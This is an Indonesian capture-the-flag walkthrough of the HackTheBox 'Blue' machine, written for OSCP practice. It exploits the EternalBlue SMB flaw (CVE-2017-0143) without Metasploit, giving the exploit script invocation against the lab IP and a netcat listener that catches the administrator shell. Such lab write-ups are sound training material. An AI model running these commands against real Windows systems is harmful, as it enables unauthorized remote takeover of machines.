HACKTHEBOX WALKTROUGH
Blue Machine
CVE 2017–0143 (Without Metasploit)
Trimakasih sudah meluangkan waktu untuk membaca artikel ini. Saat ini penulis menghadapi mesin retired HTB “Blue” yang dimana total ada 72 mesin retired setelah penulis memperbarui list target penulis yang terdapat pada list netsecfocus, dan penulis akan menempuh list target tersebut dan di dokumentasikan di akun medium ini.
Semoga pembaca semakin diberkahi dan ditingkatkan keilmuannya, serta selalu tercapai setiap tujuan dan cita-citanya atas Kehendak-Nya, juga yang sedang menempuh sertifikasi OSCP semoga tercapai dan sukses total, Aamiin. Full list mesin retired HTB oleh netsecfocus dapat di akses disini.
Reconnaissance
Result Nmap :
Notes :
Diketahui berdasarkan hasil scanning dari nmap bahwa smb service memiliki vulnerability CVE 2017–0143.
Exploit
Kemudian penulis menjalankan exploit.
# bash shell_prep.sh
# python eternalblue_exploit7.py 10.10.10.40 shellcode/sc_all.bin
Setelah menjalankan exploit eternalblue untuk exploit windows 7, dilanjuti penulis dengan menjalankan listener pada port 888.
# nc -lvvp 888
Penulis berhasil mendapatkan shell dengan privilege administrator.
Kesimpulan
Mesin ini Blue sama dengan mesin Legacy di tulisan sebelumnya. Penulis tidak menemukan perbedaan challanges, dan pola.
Reference
Target
52 mesin lagi !